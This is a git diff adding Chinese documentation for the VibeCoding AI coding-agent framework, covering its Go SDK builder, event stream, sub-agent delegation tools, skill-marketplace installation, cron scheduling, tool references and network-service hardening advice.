+        // 对于每个文本片段：
+        ch <- agent.StreamEvent{
+            Type:      agent.StreamTextDelta,
+            TextDelta: "来自我的模型的回复！",
+        }
+
+        // 3. 如果模型请求工具调用：
+        // ch <- agent.StreamEvent{
+        //     Type: agent.StreamToolCall,
+        //     ToolCall: &agent.ToolCallBlock{
+        //         ID:        "call_1",
+        //         Name:      "bash",
+        //         Arguments: []byte(`{"command":"ls"}`),
+        //     },
+        // }
+
+        // 4. 报告用量
+        ch <- agent.StreamEvent{
+            Type: agent.StreamUsage,
+            Usage: &agent.Usage{
+                InputTokens:  100,
+                OutputTokens: 50,
+                TotalTokens:  150,
+            },
+        }
+
+        // 5. 发送完成信号
+        ch <- agent.StreamEvent{
+            Type:       agent.StreamDone,
+            StopReason: "end_turn",
+        }
+    }()
+
+    return ch
+}
+```
+
+你也可以使用 Builder 上的 `WithProviderByName()` 方法，通过厂商名、Base URL、API 类型和 API Key 直接解析内置 Provider，无需自己实现 `Provider`：
+
+```go
+a, err := agent.NewBuilder().
+    WithProviderByName("openai", "", "openai-chat", os.Getenv("OPENAI_API_KEY")).
+    WithModel("gpt-4o").
+    Build()
+```
+
+---
+
+## 构建和运行 Agent
+
+使用 `Builder` 流式 API 创建 Agent：
+
+```go
+package main
+
+import (
+    "context"
+    "fmt"
+    "os"
+
+    "github.com/startvibecoding/vibecoding/agent"
+    _ "github.com/startvibecoding/vibecoding/internal/agent" // 注册内部 builder
+)
+
+func main() {
+    a, err := agent.NewBuilder().
+        WithProvider(mybackend.NewMyProvider(os.Getenv("MY_API_KEY"))).
+        WithModel("my-model-v1").
+        WithMode("agent").                          // "plan"、"agent" 或 "yolo"
+        WithWorkDir("/home/user/project").
+        WithThinkingLevel(agent.ThinkingMedium).
+        WithMaxTokens(16384).
+        WithMaxIterations(200).
+        WithToolExecutionMode("parallel").           // "parallel" 或 "sequential"
+        WithSystemPromptExtra("专注于 Go 代码。").
+        WithCompaction(true, 16384).
+        WithApprovalHandler(func(toolCallID, toolName string, args map[string]any) bool {
+            fmt.Printf("批准执行 %s？[y/n] ", toolName)
+            var input string
+            fmt.Scanln(&input)
+            return input == "y"
+        }).
+        Build()
+    if err != nil {
+        panic(err)
+    }
+
+    ctx := context.Background()
+    events := a.Run(ctx, "列出这个项目中所有的 Go 文件")
+
+    for event := range events {
+        switch event.Type {
+        case agent.EventTextDelta:
+            fmt.Print(event.TextDelta)
+        case agent.EventThinkDelta:
+            // 思考内容（可选）
+        case agent.EventToolCall:
+            fmt.Printf("\n[工具: %s]\n", event.ToolCall.Name)
+        case agent.EventToolExecutionEnd:
+            fmt.Printf("[结果: %s]\n", truncate(event.ToolResult, 200))
+        case agent.EventToolApprovalRequest:
+            // 处理审批（参见 Builder.WithApprovalHandler）
+        case agent.EventError:
+            fmt.Fprintf(os.Stderr, "错误: %v\n", event.Error)
+        case agent.EventDone:
+            fmt.Printf("\n--- 完成 (原因: %s) ---\n", event.StopReason)
+        }
+    }
+}
+
+func truncate(s string, n int) string {
+    if len(s) > n {
+        return s[:n] + "..."
+    }
+    return s
+}
+```
+
+### Builder 选项
+
+| 方法 | 默认值 | 说明 |
+|------|--------|------|
+| `WithProvider(p)` | *必填* | LLM Provider |
+| `WithProviderByName(vendor, baseURL, api, apiKey)` | — | 解析内置 Provider |
+| `WithModel(id)` | 第一个模型 | 模型 ID |
+| `WithMode(mode)` | `"agent"` | `"plan"` / `"agent"` / `"yolo"` |
+| `WithWorkDir(dir)` | `os.Getwd()` | 工作目录 |
+| `WithThinkingLevel(level)` | `ThinkingMedium` | `Off` / `Minimal` / `Low` / `Medium` / `High` / `XHigh` |
+| `WithMaxTokens(n)` | `16384` | 最大输出 token 数 |
+| `WithMaxIterations(n)` | `200` | 循环迭代安全上限 |
+| `WithToolExecutionMode(m)` | `"parallel"` | `"parallel"` / `"sequential"` |
+| `WithTools(names)` | 全部 | 过滤可用工具 |
+| `WithSystemPromptExtra(s)` | `""` | 额外的系统提示词上下文 |
+| `WithSandbox(bool)` | `false` | 启用沙箱隔离 |
+| `WithSessionDir(dir)` | `~/.vibecoding/sessions` | 会话持久化目录 |
+| `WithCompaction(enabled, reserve)` | `true, 16384` | 上下文压缩设置 |
+| `WithMultiAgent(bool)` | `false` | 启用子 Agent 工具 |
+| `WithApprovalHandler(fn)` | nil | 自定义工具审批回调 |
+
+---
+
+## 事件类型
+
+`Event` 事件流遵循 Agent 生命周期：
+
+```
+EventAgentStart
+  └─ EventTurnStart
+       ├─ EventTextDelta（流式文本）
+       ├─ EventThinkDelta（流式思考）
+       ├─ EventToolCall（工具请求）
+       ├─ EventToolExecutionStart → EventToolExecutionEnd
+       ├─ EventToolResult
+       ├─ EventToolApprovalRequest → EventToolApprovalResponse
+       ├─ EventPlanUpdate
+       └─ EventUsage
+  └─ EventTurnEnd
+  └─ ...（如果有工具调用则继续更多 turn）
+  └─ EventDone
+EventAgentEnd
+```
+
+| 事件类型 | 关键字段 | 说明 |
+|----------|----------|------|
+| `EventAgentStart` | — | Agent 开始处理 |
+| `EventAgentEnd` | `Messages` | Agent 处理完成，包含最终消息历史 |
+| `EventTurnStart` | — | 新的 LLM turn 开始 |
+| `EventTurnEnd` | `TurnMessage`, `ContextUsage` | turn 完成 |
+| `EventTextDelta` | `TextDelta` | LLM 增量文本输出 |
+| `EventThinkDelta` | `ThinkDelta` | LLM 增量思考输出 |
+| `EventToolCall` | `ToolCall`, `ToolArgs` | LLM 请求工具调用 |
+| `EventToolExecutionStart` | `ToolCallID`, `ToolName`, `ToolArgs` | 工具执行开始 |
+| `EventToolExecutionEnd` | `ToolCallID`, `ToolResult`, `ToolDiff`, `ToolError` | 工具执行完成 |
+| `EventToolResult` | `ToolCallID`, `ToolResult` | 工具结果已记录 |
+| `EventToolApprovalRequest` | `ApprovalID`, `ApprovalTool`, `ApprovalArgs` | 工具需要用户审批 |
+| `EventPlanUpdate` | `Plan` | 结构化任务计划更新 |
+| `EventUsage` | `Usage`, `ContextUsage` | Token 用量报告 |
+| `EventDone` | `StopReason`, `Usage` | Agent 循环完成 |
+| `EventError` | `Error`, `StopReason` | 发生错误 |
+| `EventCompactionStart/End` | `StatusMessage` | 上下文压缩生命周期 |
+
+---
+
+## 子 Agent 模式
+
+子 Agent 模式允许主 Agent 将有明确边界的独立子任务委派给并行运行的子 Agent。通过 CLI（`--multi-agent`）或 SDK（`WithMultiAgent(true)`）启用。
+
+### 架构概览
+
+```
+┌─────────────────────────────────────────────────┐
+│                 主 Agent (Main)                   │
+│  - 完整的系统提示词、工具、上下文                   │
+│  - 编排者角色                                     │
+│  - 拥有 subagent_* 工具                           │
+├─────────────────────────────────────────────────┤
+│         AgentManager                             │
+│   ┌──────────┐  ┌──────────┐  ┌──────────┐     │
+│   │ 子Agent  │  │ 子Agent  │  │ 子Agent  │     │
+│   │   #1     │  │   #2     │  │   #3     │     │
+│   │ (搜索)   │  │ (审查)   │  │ (测试)   │     │
+│   └──────────┘  └──────────┘  └──────────┘     │
+│         ↑            ↑             ↑             │
+│     独立的        独立的        独立的             │
+│     上下文、      上下文、      上下文、           │
+│     注册表、      注册表、      注册表、           │
+│     会话          会话          会话               │
+└─────────────────────────────────────────────────┘
+```
+
+### 核心组件
+
+| 组件 | 包 | 说明 |
+|------|-----|------|
+| `AgentManager` | `internal/agent` | 管理所有 Agent 实例的生命周期，追踪父子关系，执行策略 |
+| `AgentFactory` | `internal/agent` | 以一致的配置创建 Agent，每个 Agent 拥有独立的工具注册表 |
+| `EventRouter` | `internal/agent` | 按 `AgentID` 路由事件到对应处理器或全局处理器 |
+| `SubAgentPolicy` | `internal/agent` | 安全约束：最多 5 个子 Agent、允许的模式、每个 Agent 超时 10 分钟 |
+| `subagent_*` 工具 | `internal/agent` | 主 Agent 用来创建/管理子 Agent 的工具 |
+
+### 子 Agent 工具
+
+启用多 Agent 模式后，主 Agent 会获得四个工具：
+
+#### `subagent_spawn`
+
+创建并启动一个有明确边界的子 Agent 任务。
+
+```json
+{
+  "task": "搜索 src/ 目录下已废弃函数 X 的所有使用",
+  "mode": "agent",
+  "work_dir": "/home/user/project",
+  "tools": ["read", "grep", "find", "ls"],
+  "max_iterations": 50,
+  "system_prompt_extra": "仅关注 src/ 目录"
+}
+```
+
+返回一个用于轮询的 handle：
+
+```json
+{
+  "handle": "agent-1",
+  "status": "running",
+  "timeout": "10m0s"
+}
+```
+
+#### `subagent_status`
+
+查询子 Agent 的状态和结果：
+
+```json
+{
+  "handle": "agent-1"
+}
+```
+
+返回：
+
+```json
+{
+  "handle": "agent-1",
+  "status": "done",
+  "message_count": 12,
+  "last_response": "找到 3 处函数 X 的使用: ...",
+  "updated_at": "2025-05-28T10:30:00Z"
+}
+```
+
+可能的状态值：`"ready"`、`"running"`、`"done"`、`"error"`。
+
+#### `subagent_send`
+
+向运行中的子 Agent 发送后续消息：
+
+```json
+{
+  "handle": "agent-1",
+  "message": "也检查一下 test/ 目录"
+}
+```
+
+#### `subagent_destroy`
+
+销毁已完成的子 Agent 并释放资源：
+
+```json
+{
+  "handle": "agent-1"
+}
+```
+
+### 子 Agent 策略和约束
+
+| 约束 | 默认值 | 说明 |
+|------|--------|------|
+| 最大子 Agent 数 | 5 | 每个父 Agent 最多并发子 Agent 数 |
+| 允许的模式 | `["agent"]` | 子 Agent 默认使用 agent 模式 |
+| 单个 Agent 超时 | 10 分钟 | 每个子 Agent 有独立的超时时间 |
+| 总超时 | 30 分钟 | 所有子 Agent 的全局超时 |
+| 嵌套 | 禁止 | 子 Agent **不能**创建自己的子 Agent |
+| 沙箱 | 继承 | 子 Agent 继承父 Agent 的沙箱配置 |
+
+### 子 Agent 隔离
+
+每个子 Agent 运行时拥有**完全隔离的状态**：
+
+- **独立工具注册表** — 拥有自己的 `tools.Registry`，包含独立的 `workDir`、`Sandbox` 和 `JobManager`
+- **独立消息历史** — 独立的对话上下文
+- **独立会话** — 独立的会话存储
+- **工具过滤** — `subagent_*` 工具从子 Agent 的注册表中移除，防止嵌套
+- **额外上下文** — 包含 `SubAgentOperatingContract`，指示子 Agent 在任务范围内工作
+
+### SDK 用法：启用多 Agent 模式
+
+```go
+a, err := agent.NewBuilder().
+    WithProvider(myProvider).
+    WithModel("claude-sonnet-4-20250514").
+    WithMode("agent").
+    WithMultiAgent(true). // 启用子 Agent 工具
+    Build()
+```
+
+设置 `WithMultiAgent(true)` 后，Agent 的系统提示词将包含子 Agent 编排指令，`subagent_spawn/status/send/destroy` 工具将变为可用。
+
+### 子 Agent 的事件路由
+
+子 Agent 的事件携带子 Agent 的 `AgentID`。使用 `EventRouter` 将事件分发到正确的处理器：
+
+```go
+// 内部使用示例（仅供参考）
+router := agent.NewEventRouter()
+
+// 为特定 Agent 注册处理器
+router.RegisterAgent("agent-1", agent.RouterEventHandlerFunc(func(e agent.Event) error {
+    fmt.Printf("[%s] %v\n", e.AgentID, e.Type)
+    return nil
+}))
+
+// 注册全局处理器，接收所有 Agent 的事件
+router.RegisterGlobal(agent.RouterEventHandlerFunc(func(e agent.Event) error {
+    // 记录所有 Agent 的事件
+    return nil
+}))
+```
+
+### 子 Agent 最佳实践
+
+1. **为独立工作创建子 Agent** — 子 Agent 最适合并行代码搜索、审查、测试或调查等互不依赖的任务。
+2. **给出清晰的范围** — 每个子 Agent 的任务应包含：做什么、在哪里找、产出什么、何时停止。
+3. **限制工具** — 将工具限制为任务所需（例如搜索任务只需只读工具）。
+4. **轮询并验证** — 不要盲目信任子 Agent 的结果。使用 `subagent_status` 检查后验证重要结论。
+5. **及时清理** — 始终对已完成的 Agent 调用 `subagent_destroy` 释放资源。
+6. **避免过度委派** — 小型、顺序或高度有状态的工作直接在主 Agent 中完成更好。
+
+### 审批转发
+
+子 Agent 中需要审批的工具调用（例如 agent 模式下的 `bash`）会被转发到父 Agent 的事件通道。父 TUI 或审批处理器会看到携带子 Agent `AgentID` 的 `EventToolApprovalRequest` 事件，用户可以在单一界面上审批/拒绝所有 Agent 的工具调用。
+
+---
+
+## 内部架构参考
+
+供需要了解内部接线的开发者参考：
+
+```
+agent/                          # 公共包（导入这个）
+  ├── types.go                  # Agent、Message、Event 类型
+  ├── provider.go               # Provider、ChatParams、StreamEvent 类型
+  └── builder.go                # Builder API → 调用 buildInternal
+
+internal/agent/                 # 内部实现
+  ├── agent.go                  # 核心 Agent 循环
+  ├── factory.go                # AgentFactory（创建具有独立注册表的 Agent）
+  │   └── init() { SetBuilderFunc(buildFromPublicBuilder) }
+  ├── bridge.go                 # 类型转换器（公共 ↔ 内部）
+  │   ├── ProviderAdapter       # 包装公共 Provider → 内部
+  │   └── AgentAdapter          # 包装内部 Agent → 公共
+  ├── manager.go                # AgentManager（生命周期、父子关系追踪）
+  ├── subagent.go               # subagent_spawn/status/send/destroy 工具
+  ├── router.go                 # EventRouter（按 Agent + 全局分发）
+  └── system_prompt.go          # 系统提示词构建器
+```
+
+`internal/agent/bridge.go` 中的桥接层自动完成公共和内部类型的转换：
+
+- `agent.Builder.Build()` → 调用 `buildFromPublicBuilder()` → 创建内部 `Agent` → 包装为 `AgentAdapter` → 返回 `agent.Agent`
+- 公共 `Provider` → `ProviderAdapter` → 内部 `provider.Provider`
+- 内部 `Event` → `EventToPublic()` → 公共 `agent.Event`
+- 内部 `Message` → `MessageToPublic()` → 公共 `agent.Message`（及反向）
diff --git a/docs/zh/security.md b/docs/zh/security.md
index a57cf7b..8790909 100644
--- a/docs/zh/security.md
+++ b/docs/zh/security.md
@@ -123,6 +123,25 @@ vibecoding -M yolo
 - 可能执行危险命令
 - 可能泄露敏感信息
 
+## 网络服务加固
+
+Gateway、Hermes 和 A2A 都可能暴露 HTTP/WebSocket 入口。当工具运行在 `agent` 或 `yolo` 模式时，应将这些服务视为远程代码执行入口来保护。
+
+- **Gateway**：对 loopback 以外地址暴露前应启用 `auth.enabled`；当 Gateway 在非 loopback 地址、`yolo` 模式且未认证时，启动会输出警告。
+- **A2A**：独立 A2A 默认绑定 `127.0.0.1`。只有明确需要对外暴露时才使用 `--host 0.0.0.0`，并配置 auth token。
+- **Hermes WebSocket**：WebSocket 握手时使用 `Authorization: Bearer <token>` 发送 token。Query-string token 仅作为兼容方式保留。
+- **工作目录**：使用 `allowedWorkDirs` / `allowed_work_dirs` 限制请求级或平台级工作目录。
+
+## 可信配置中的 Shell 命令
+
+Provider API key 支持通过 `apiKey: "!command"` 从 shell 命令读取，但默认关闭。仅在可信本地配置中启用：
+
+```bash
+export VIBECODING_ALLOW_SHELL_CONFIG=1
+```
+
+共享配置更推荐使用 `${DEEPSEEK_API_KEY}` 这样的环境变量引用。
+
 ## 启用沙箱
 
 ### 命令行方式
diff --git a/docs/zh/skillhub.md b/docs/zh/skillhub.md
new file mode 100644
index 0000000..b619059
--- /dev/null
+++ b/docs/zh/skillhub.md
@@ -0,0 +1,220 @@
+# 在线 Skill 市场集成
+
+VibeCoding 兼容市面上的 Skill 市场（SkillHub / ClawHub），可以直接使用这些平台发布的技能包。
+
+| 平台 | 地址 | 区域 |
+|------|------|------|
+| **SkillHub** | [https://skillhub.cn](https://skillhub.cn/) | 中国 |
+| **ClawHub** | [https://clawhub.ai](https://clawhub.ai/) | 海外 |
+
+> **说明：** VibeCoding 不内建 Skill 市场，但采用标准的技能目录格式（`SKILL.md`），
+> 与 SkillHub / ClawHub 发布的技能包完全兼容。从市场下载的技能放入技能目录即可直接使用，
+> 无需任何额外适配。
+
+本指南涵盖：
+
+1. [从市场安装技能](#从市场安装技能) — 三步完成
+2. [技能格式兼容](#技能格式兼容) — 标准格式说明
+3. [本地技能系统](#本地技能系统) — 已实现的功能
+4. [Cron 基础设施](#cron-基础设施) — 定时任务基础
+
+---
+
+## 从市场安装技能
+
+从 SkillHub / ClawHub 安装技能只需三步：
+
+### 1. 下载技能包
+
+从市场下载技能包（通常是一个包含 `SKILL.md` 的目录或压缩包）。
+
+### 2. 解压到技能目录
+
+```bash
+# 全局安装（所有项目可用）
+# Linux/macOS:
+unzip go-expert.zip -d ~/.vibecoding/skills/
+# Windows:
+Expand-Archive go-expert.zip -DestinationPath "$env:APPDATA\vibecoding\skills\"
+
+# 项目级安装（仅当前项目可用）
+unzip go-expert.zip -d .skills/
+```
+
+### 3. 验证安装
+
+```
+> /skills
+Loaded 3 skills:
+  - go-expert (global)        ← 刚安装的
+  - coding-standards (global)
+  - project-conventions (project)
+```
+
+就这么简单。技能已被自动加载并注入系统提示词。
+
+---
+
+## 技能格式兼容
+
+VibeCoding 的技能格式与 SkillHub / ClawHub 标准完全一致：
+
+```
+skill-name/
+├── SKILL.md              # 必需：技能定义文件
+└── references/           # 可选：按需加载的参考文件
+    ├── api-guide.md
+    └── examples.md
+```
+
+### SKILL.md 标准格式
+
+```markdown
+# 技能名称
+
+简短描述。
+
+## 规则
+
+- 规则 1
+- 规则 2
+
+## 示例
+
+...
+```
+
+### 参考文件
+
+技能可以包含 `references/` 目录下的参考文件，通过 `skill_ref` 工具按需加载：
+
+```
+> skill_ref(skill="go-expert", ref="references/api-guide.md")
+→ 返回 api-guide.md 的内容
+```
+
+这允许技能包含大量参考资料而不占用系统提示词空间。
+
+---
+
+## 本地技能系统
+
+除了从市场下载，你也可以直接创建本地技能。
+
+### 技能目录
+
+| 类型 | 位置 | 作用域 |
+|------|------|--------|
+| 全局 | `~/.vibecoding/skills/`（Linux/macOS）或 `%APPDATA%\vibecoding\skills\`（Windows） | 所有项目 |
+| 项目 | `.skills/`（项目根目录） | 当前项目，覆盖同名全局技能 |
+
+### 创建技能
+
+```bash
+mkdir -p ~/.vibecoding/skills/go-expert
+cat > ~/.vibecoding/skills/go-expert/SKILL.md << 'EOF'
+# Go Expert
+
+专家级 Go 编码规范。
+
+## 规则
+
+- 使用 `gofmt` 格式化代码
+- 遵循 Effective Go 指南
+- 返回错误，不要 panic
+- 使用 `fmt.Errorf` 和 `%w` 包装错误
+
+## 测试
+
+- 编写表驱动测试
+- 使用 `t.Run` 子测试
+- 目标覆盖率 >80%
+EOF
+```
+
+### 使用技能
+
+```
+> /skills
+已加载 2 个技能:
+  - go-expert (全局)
+  - project-conventions (项目)
+
+> /skill:go-expert
+已加载技能: go-expert
+```
+
+### 配置
+
+在 `settings.json` 中配置全局技能目录：
+
+```json
+{
+  "skillsDir": "~/.vibecoding/skills"
+}
+```
+
+项目技能自动从 `.skills/` 加载，无需额外配置。
+
+---
+
+## Cron 基础设施
+
+VibeCoding 已有内部 cron 基础设施（`internal/cron` 包）和 TUI 命令入口。Cron 存储将任务持久化到 `~/.vibecoding/cron.json`，调度器每 30 秒检查一次到期任务。
+
+### `/cron` TUI 命令
+
+需要多 Agent 模式（`--multi-agent` 或 Ctrl+P 切换）：
+
+```
+> /cron add <描述>             — 添加定时任务
+> /cron list                   — 列出定时任务
+> /cron enable <id>            — 启用任务
+> /cron disable <id>           — 禁用任务
+> /cron remove <id>            — 删除任务
+> /cron run <id>               — 立即运行任务
+```
+
+### Cron 任务数据模型
+
+| 字段 | 描述 |
+|------|------|
+| `id` | 唯一任务 ID（如 `cron-1716883200`） |
+| `name` | 任务简短描述 |
+| `prompt` | 发送给子 Agent 的任务提示词 |
+| `schedule` | 5 字段 cron 表达式 |
+| `mode` | `agent` 或 `yolo` |
+| `enabled` | 任务是否激活 |
+| `last_run` | 上次执行时间戳 |
+| `next_run` | 计算得出的下次执行时间 |
+| `run_count` | 总执行次数 |
+| `last_status` | `success`、`failed` 或 `running` |
+
+### 调度器架构
+
+```
+调度器循环 (每 30 秒)
+    │
+    ├── 从存储列出所有已启用任务
+    │
+    ├── 检查每个任务：是否到期？
+    │   ├── 从未运行 → 到期
+    │   ├── NextRun 已过 → 到期
+    │   └── 上次运行超过 1 小时 → 到期（兜底）
+    │
+    └── 到期任务 → 创建子 Agent
+              │
+              ├── 标记任务为 "running"
+              ├── 通过 AgentManager 创建 Agent
+              ├── 使用任务 prompt 运行 Agent
+              ├── 收集结果
+              └── 更新任务状态 (success/failed)
+```
+
+---
+
+## 相关文档
+
+- [技能系统](skills.md) — 本地技能格式和管理
+- [配置详解](configuration.md) — 完整设置参考
+- [安全与沙箱](security.md) — 沙箱和审批控制
diff --git a/docs/zh/tools.md b/docs/zh/tools.md
index 3687019..22a5b21 100644
--- a/docs/zh/tools.md
+++ b/docs/zh/tools.md
@@ -13,6 +13,18 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 | `grep` | 正则表达式搜索 | 只读 |
 | `find` | 文件名搜索 | 只读 |
 | `ls` | 列出目录内容 | 只读 |
+| `plan` | 发布任务计划/状态 | 只读 |
+| `jobs` | 列出和管理后台任务 | 只读 |
+| `kill` | 终止正在运行的后台任务 | 仅 standard/yolo |
+| `question` | 向用户提出多选问题 | 仅 Plan 模式 (TUI) |
+| `memory` | 读写持久记忆 | 仅 Hermes 模式 |
+| `cron` | 管理定时后台任务 | 仅 Hermes/多 Agent 模式 |
+| `subagent_spawn` | 启动委托子 Agent 任务 | 仅多 Agent 模式 |
+| `subagent_status` | 查询子 Agent 状态/结果 | 仅多 Agent 模式 |
+| `subagent_send` | 向子 Agent 发送后续指令 | 仅多 Agent 模式 |
+| `subagent_destroy` | 停止并移除子 Agent | 仅多 Agent 模式 |
+| `a2a_dispatch` | 向远程 A2A Agent 发送任务 | 仅 A2A Master 模式 |
+| `skill_ref` | 加载技能引用文件 | 技能可用时 |
 
 ## 工具详解
 
@@ -52,6 +64,130 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 
 ---
 
+### plan - 任务计划
+
+发布或更新可见的任务计划。步骤支持 `pending`、`running`、`done` 和 `failed` 状态。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `title` | string | - | 简短计划标题 |
+| `steps` | array | ✓ | 有序计划步骤 |
+| `note` | string | - | 可选简短说明 |
+
+**示例:**
+
+```json
+{
+  "title": "实现结构化 diff",
+  "steps": [
+    {"title": "阅读工具结果流程", "status": "done"},
+    {"title": "更新 write/edit 结果", "status": "running"},
+    {"title": "运行 focused tests", "status": "pending"}
+  ]
+}
+```
+
+**返回:** 提供给 TUI、print 模式和 ACP 客户端的结构化计划元数据。
+
+---
+
+### subagent_* - 委托工作
+
+`subagent_*` 工具仅在使用 `--multi-agent` 启动时注册。主 Agent 可通过它们将边界清晰的任务委托给子 Agent；子 Agent 拥有独立的 messages、context、session、registry 和 job manager 状态。
+
+子 Agent 不能继续派生子 Agent。
+
+#### subagent_spawn
+
+异步启动子 Agent，并返回 handle。
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `task` | string | ✓ | 聚焦的委托任务 |
+| `mode` | string | - | `plan`、`agent` 或 `yolo`；默认 `agent` |
+| `work_dir` | string | - | 子 Agent 工作目录 |
+| `tools` | array | - | 可选工具白名单 |
+| `max_iterations` | integer | - | 迭代上限 |
+| `system_prompt_extra` | string | - | 附加子 Agent 上下文 |
+
+#### subagent_status
+
+查询某个 handle 的状态和最后结果：
+
+```json
+{ "handle": "agent-1" }
+```
+
+#### subagent_send
+
+向已有子 Agent 发送后续消息：
+
+```json
+{ "handle": "agent-1", "message": "接下来关注 provider 测试。" }
+```
+
+#### subagent_destroy
+
+销毁子 Agent 并释放资源：
+
+```json
+{ "handle": "agent-1" }
+```
+
+---
+
+### a2a_dispatch - A2A 远程 Agent 调度
+
+向 `a2a-list.json` 中注册的远程 A2A Agent 发送任务。仅在使用 `--enable-a2a-master` 启动时注册。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `agent_name` | string | ✓ | 目标 agent 名称（从配置自动枚举） |
+| `message` | string | ✓ | 任务消息 |
+
+**示例:**
+
+```json
+{
+  "agent_name": "code-reviewer",
+  "message": "审查 internal/handler.go 的代码质量"
+}
+```
+
+**返回:** 远程 agent 的文本响应
+
+详见 [A2A 协议 - A2A Master 模式](a2a.md#a2a-master-模式)。
+
+---
+
+### skill_ref - 技能引用加载
+
+加载技能目录中的引用文件。仅在有可用技能时注册。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `skill` | string | ✓ | 技能名称（目录名） |
+| `ref` | string | ✓ | 引用文件路径（相对于技能目录） |
+
+**示例:**
+
+```json
+{
+  "skill": "my-conventions",
+  "ref": "references/api-style.md"
+}
+```
+
+**返回:** 引用文件内容
+
+---
+
 ### write - 文件写入
 
 创建新文件或覆盖现有文件。
@@ -72,7 +208,7 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 }
 ```
 
-**返回:** 成功/失败消息
+**返回:** 成功/失败消息；内容变更时附带结构化 diff 元数据。
 
 ---
 
@@ -115,6 +251,8 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 3. 尽量使用足够长的 `oldText` 以确保唯一匹配
 4. 单次调用可以包含多个编辑操作
 
+**返回:** 成功/失败消息；内容变更时附带结构化 diff 元数据。
+
 ---
 
 ### bash - 命令执行
@@ -226,6 +364,138 @@ VibeCoding 提供了一组内置工具，用于文件操作、代码搜索和命
 
 ---
 
+### jobs - 后台任务管理
+
+列出并查看通过 `bash async=true` 启动的后台任务。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `jobId` | int | - | 按 ID 获取特定任务的详细状态 |
+| `cleanup` | bool | - | 清理已完成的任务 |
+
+**示例:**
+
+```json
+{}
+```
+
+**返回:** 后台任务列表及状态（运行中/已完成），或特定任务的详细信息（PID、运行时间、stdout、stderr）。
+
+---
+
+### kill - 终止后台任务
+
+终止通过 `bash async=true` 启动的正在运行的后台任务。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `jobId` | int | ✓ | 要终止的任务 ID |
+
+**示例:**
+
+```json
+{ "jobId": 3 }
+```
+
+**返回:** 确认消息，包含任务 ID 和 PID。
+
+---
+
+### question - 用户澄清（Plan 模式）
+
+在 Plan 模式下向用户提出多选问题以澄清需求。仅在 TUI + plan 模式下注册。通过 `QuestionHandler` 可选接口（类型断言）暴露；不在 Gateway/Hermes/ACP 中注册。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `question` | string | ✓ | 问题文本 |
+| `options` | array | ✓ | 选项列表 |
+
+**示例:**
+
+```json
+{
+  "question": "我们应该使用哪个数据库？",
+  "options": ["PostgreSQL", "SQLite", "MongoDB"]
+}
+```
+
+**返回:** 用户选择的选项或自定义答案。
+
+---
+
+### memory - 持久记忆（Hermes）
+
+读写存储在 `memory.md` 中的持久记忆。记忆跨会话持久保存。仅在 Hermes 模式下可用。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `action` | string | ✓ | 操作：`read`、`add`、`update`、`delete` |
+| `section` | string | - | 节名称（如 `User Profile`、`Working Memory`、`Lessons Learned`）。add/update/delete 必填；read 时可选。 |
+| `content` | string | - | add/delete 操作的内容 |
+| `old` | string | - | update 操作的旧文本 |
+| `new` | string | - | update 操作的新替换文本 |
+
+**示例:**
+
+```json
+{
+  "action": "add",
+  "section": "User Profile",
+  "content": "后端开发偏好 Go 而非 Python。"
+}
+```
+
+**返回:** 操作确认或节内容。
+
+---
+
+### cron - 定时任务（Hermes / 多 Agent）
+
+管理通过子 Agent 执行的定时后台任务。在 Hermes 模式和 CLI 多 Agent 模式下可用。
+
+**参数:**
+
+| 参数 | 类型 | 必填 | 描述 |
+|------|------|------|------|
+| `action` | string | ✓ | 操作：`list`、`create`、`enable`、`disable`、`remove`、`run` |
+| `id` | string | - | 任务 ID（enable/disable/remove/run 必填） |
+| `name` | string | - | 任务简短名称（create 必填） |
+| `prompt` | string | - | 子 Agent 任务提示（create 必填） |
+| `schedule` | string | - | 调度：`@daily`、`@weekly`、`@monthly`、`@hourly`、`@every 30m`、`@every 2h`，或为空表示单次执行 |
+| `oneshot` | bool | - | 为 true 时执行一次后自动禁用 |
+| `mode` | string | - | Agent 模式：`agent` 或 `yolo`（默认 `yolo`） |
+
+**示例:**
+
+```json
+{
+  "action": "create",
+  "name": "daily-check",
+  "prompt": "检查过时的依赖并报告。",
+  "schedule": "@daily"
+}
+```
+
+**返回:** 任务列表、创建确认或操作结果。
+
+---
+
+### MCP 动态工具
+
+来自 MCP（Model Context Protocol）服务器的工具、资源和提示在每个会话中自动发现和注册。工具名称和参数由 MCP 服务器定义，而非 VibeCoding。MCP 工具会与内置工具一起出现在工具列表中。
+
+详见 [技能](skills.md) 和 [配置](configuration.md) 了解 MCP 服务器设置。
+
+---
+
 ## 工具使用模式
 
 ### 读取-修改-写入模式
diff --git a/go.mod b/go.mod
index 336512a..bde92df 100644
--- a/go.mod
+++ b/go.mod
@@ -7,8 +7,10 @@ require (
 	github.com/charmbracelet/bubbletea v1.3.4
 	github.com/charmbracelet/glamour v1.0.0
 	github.com/charmbracelet/lipgloss v1.1.1-0.20250404203927-76690c660834
-	github.com/charmbracelet/x/cellbuf v0.0.13
+	github.com/larksuite/oapi-sdk-go/v3 v3.9.3
 	github.com/spf13/cobra v1.10.2
+	golang.org/x/net v0.38.0
+	golang.org/x/sys v0.37.0
 	golang.org/x/term v0.36.0
 )
 
@@ -19,11 +21,14 @@ require (
 	github.com/aymerick/douceur v0.2.0 // indirect
 	github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc // indirect
 	github.com/charmbracelet/x/ansi v0.10.2 // indirect
+	github.com/charmbracelet/x/cellbuf v0.0.13 // indirect
 	github.com/charmbracelet/x/exp/slice v0.0.0-20250327172914-2fdc97757edf // indirect
 	github.com/charmbracelet/x/term v0.2.1 // indirect
 	github.com/dlclark/regexp2 v1.11.5 // indirect
